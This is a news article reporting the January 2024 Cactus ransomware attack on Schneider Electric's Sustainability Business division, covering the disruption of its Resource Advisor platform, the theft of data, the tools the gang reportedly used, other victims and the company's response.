Schneider Electric, the French industrial giant, has just suffered a major computer attack. The Cactus ransomware, already well-known in cybercrime circles, targeted this company renowned for its innovative energy solutions. This incident raises many questions about data security in large companies.
Schneider Electric: a leader in the energy industry
Before delving into the heart of this cyberattack, it’s essential to understand Schneider Electric’s role in the industrial sector. With over 150,000 employees worldwide, this French company specializes in the supply of electrical equipment and renewable energy solutions. Its worldwide reputation makes it a key player in its field.
The January 17, 2024 attack: a major blow for Schneider Electric
January 17, 2024 was a dark day for Schneider Electric. Its sustainable development branch was the target of a cyber attack, paralyzing the “Resource Advisor” Cloud platform. This service, essential for advising companies on renewable energies, remained inaccessible for several days, causing major inconvenience for users.
Confirmation and wider impact of the attack
Officially confirmed by Schneider Electric on January 29, the ransomware attack specifically targeted the Sustainability Business division, disrupting the “Resource Advisor” service as well as other systems specific to this division. Schneider Electric reacted quickly, mobilizing its response team to contain the incident and reinforce existing security measures. According to a company press release, “From an impact assessment point of view, the ongoing investigation shows that data has been accessed. As further information becomes available, Schneider Electric’s Sustainability Business Division will continue the dialogue directly with its affected customers and will continue to provide information and assistance where appropriate.” This statement underlines Schneider Electric’s commitment to open communication with its affected customers and to providing ongoing support.
Cybercriminals’ strategy: double extortion and data theft
The Cactus ransomware, first identified in March 2023, targeted Schneider Electric with a double extortion strategy, rendering the platform unusable and stealing terabytes of data. In addition to this tactic, Cactus demonstrated sophisticated access and attack techniques. According to BleepingComputer, which first reported the attack, Cactus uses legitimate tools such as Splashtop, AnyDesk and SuperOps RMM for remote access, as well as Cobalt Strike and Chisel for post-exploitation activities. Once access has been gained, Cactus deploys a batch script to uninstall popular antivirus solutions, increasing their ability to operate undetected. For data exfiltration, Cactus uses the Rclone tool and a PowerShell script called TotalExec, previously used by operators of the BlackBasta ransomware, to automate the encryption process. Cactus is also known to exploit vulnerabilities in VPNs from Fortinet, a service provider used by Schneider Electric, demonstrating the technical sophistication of cybercriminals.
Security issues: customer data potentially compromised
In addition to existing concerns, it’s important to note that the nature of the data stolen in the Cactus attack could be particularly sensitive. Schneider Electric’s Sustainability Business division, targeted by the attack, offers consulting services to companies on renewable energy solutions and compliance with climate regulations. As a result, the compromised data could include detailed information on customers’ energy usage, industrial control and automation systems, as well as data on compliance with environmental and energy regulations. This possibility raises heightened concerns about the attack’s potential impact on Schneider Electric’s customers and the security of critical information in the energy sector. Schneider Electric’s sustainability customers include several large companies such as Walmart, Lexmark, DHL and PepsiCo.
Other Cactus victims: a wider context
In addition to Schneider Electric, Cactus has targeted several other French companies, adding to its list of victims. These include Odalys Vacances in the tourist accommodation sector, Promotrans specialized in professional training, and Agoravita, a digital services company. This diversity of targets illustrates the versatile threat posed by Cactus in the cybercrime landscape. Their approach, combining the purchase of credentials, partnerships with malware distributors, phishing attacks and the exploitation of vulnerabilities, demonstrates the sophistication and adaptability of their attack methods. Cactus’ ability to target companies in such a wide range of fields underlines the importance for all industries of strengthening their cybersecurity measures in the face of such versatile and unpredictable adversaries.
The Cactus gang: a growing threat in the world of ransomware
The Cactus gang, active since March 2023, has rapidly established itself as a serious threat in the world of cybercrime. With a growing number of corporate victims, including Schneider Electric, Cactus is demonstrating a notable ability to target and compromise large-scale organizations. For an in-depth analysis of their methods and impact, we invite you to read our detailed article on the Cactus gang.
Schneider Electric and cybersecurity: an ongoing battle
This isn’t the first time Schneider Electric has fallen victim to a cyber attack. Recently, the Clop ransomware gang exploited a security flaw in MOVEit Transfer, another of the company’s services, resulting in data theft. These repeated incidents highlight the ongoing cybersecurity challenges facing large enterprises.
Restoration plan and security measures
In response to the attack, Schneider Electric quickly put in place a recovery plan, aiming to restore access to the affected systems within two working days. This exemplary responsiveness testifies to the company’s commitment to minimizing the impact on its operations and customers. This incident highlights the need for companies of all sizes to continually reinforce their security measures in an increasingly connected world.
The importance of a rapid and effective response: this latest cyberattack underlines the importance of effective crisis management in the face of the growing threat of ransomware. The ability to react quickly, implement restoration measures and communicate effectively with stakeholders is essential to reduce damage and speed up the resumption of normal activities.
